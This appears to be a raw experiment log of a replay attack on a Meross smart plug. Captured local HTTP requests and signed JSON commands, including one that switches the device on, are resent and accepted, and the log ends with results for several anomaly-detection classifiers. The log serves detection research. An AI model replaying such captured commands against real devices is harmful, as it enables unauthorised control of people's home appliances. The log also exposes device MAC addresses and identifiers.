POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"545834bdf0f730256a24d879108dae33","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"28feb1f96f85feac1290b216a083c6cd","timestamp":1693906289,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"545834bdf0f730256a24d879108dae33","namespace":"Appliance.System.All","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693906288,"timestampMs":825,"sign":"8065c678ed36891f3f4854ad5e45ddc4"},"payload":{"all":{"system":{"hardware":{"type":"mss310h","subType":"it","version":"3.0.0","chipType":"mt7682","uuid":"21012131127760290d3548e1e947c6ee","macAddress":"48:e1:e9:47:c6:ee"},"firmware":{"version":"3.1.1","compileTime":"2020/02/26 09:43:54 GMT +08:00","wifiMac":"2c:33:58:b8:15:96","innerIp":"10.0.0.109","server":"mqtt-eu-3.meross.com","port":443,"userId":2884081},"time":{"timestamp":1693906288,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":0}},"digest":{"togglex":[{"channel":0,"onoff":0,"lmTime":1693906263}],"triggerx":[],"timerx":[]}}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"65812bb399f83f14a8e137265afb8e72","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"eb9513c20f815eea36eda417346065b1","timestamp":1693906289,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"65812bb399f83f14a8e137265afb8e72","namespace":"Appliance.System.Online","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693906288,"timestampMs":903,"sign":"473735692d6c81d851a941d52c884a17"},"payload":{"online":{"status":0}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 348
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"49c283880617a18f6f7a5ef543a4a01f","method":"SET","namespace":"Appliance.Control.ToggleX","payloadVersion":1,"sign":"2e0dee1e9d7e8de291b2e71c71531579","timestamp":1693906296,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{"togglex":{"channel":0,"onoff":1}}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"49c283880617a18f6f7a5ef543a4a01f","namespace":"Appliance.Control.ToggleX","method":"SETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693906296,"timestampMs":245,"sign":"2e0dee1e9d7e8de291b2e71c71531579"},"payload":{}}

START REPLAY ATTACK
#######################################################################################
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 348
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"49c283880617a18f6f7a5ef543a4a01f","method":"SET","namespace":"Appliance.Control.ToggleX","payloadVersion":1,"sign":"2e0dee1e9d7e8de291b2e71c71531579","timestamp":1693906296,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{"togglex":{"channel":0,"onoff":1}}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"49c283880617a18f6f7a5ef543a4a01f","namespace":"Appliance.Control.ToggleX","method":"SETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693906341,"timestampMs":419,"sign":"10ba63a1c7509336a24ae48a9a7fd1bd"},"payload":{}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"65812bb399f83f14a8e137265afb8e72","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"eb9513c20f815eea36eda417346065b1","timestamp":1693906289,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"65812bb399f83f14a8e137265afb8e72","namespace":"Appliance.System.Online","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693906341,"timestampMs":427,"sign":"bf6d9e3655102ef9ec1fe2d2a95462c5"},"payload":{"online":{"status":0}}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"545834bdf0f730256a24d879108dae33","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"28feb1f96f85feac1290b216a083c6cd","timestamp":1693906289,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"545834bdf0f730256a24d879108dae33","namespace":"Appliance.System.All","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1693906341,"timestampMs":434,"sign":"3495ecbce57576894d18cc14e470fb7a"},"payload":{"all":{"system":{"hardware":{"type":"mss310h","subType":"it","version":"3.0.0","chipType":"mt7682","uuid":"21012131127760290d3548e1e947c6ee","macAddress":"48:e1:e9:47:c6:ee"},"firmware":{"version":"3.1.1","compileTime":"2020/02/26 09:43:54 GMT +08:00","wifiMac":"2c:33:58:b8:15:96","innerIp":"10.0.0.109","server":"mqtt-eu-3.meross.com","port":443,"userId":2884081},"time":{"timestamp":1693906341,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":0}},"digest":{"togglex":[{"channel":0,"onoff":1,"lmTime":1693906341}],"triggerx":[],"timerx":[]}}}}

****************************************************************
REPLAY ATTACK NOT SUCCESSFUL WITH CLF=OneClassSVM(gamma='auto', nu=0.001)
REPLAY ATTACK SUCCESSFUL WITH CLF=IsolationForest(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=EllipticEnvelope(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=LocalOutlierFactor(contamination=0.01, novelty=True)
REPLAY ATTACK SUCCESSFUL WITH CLF=CustomClassifier()
END REPLAY ATTACK
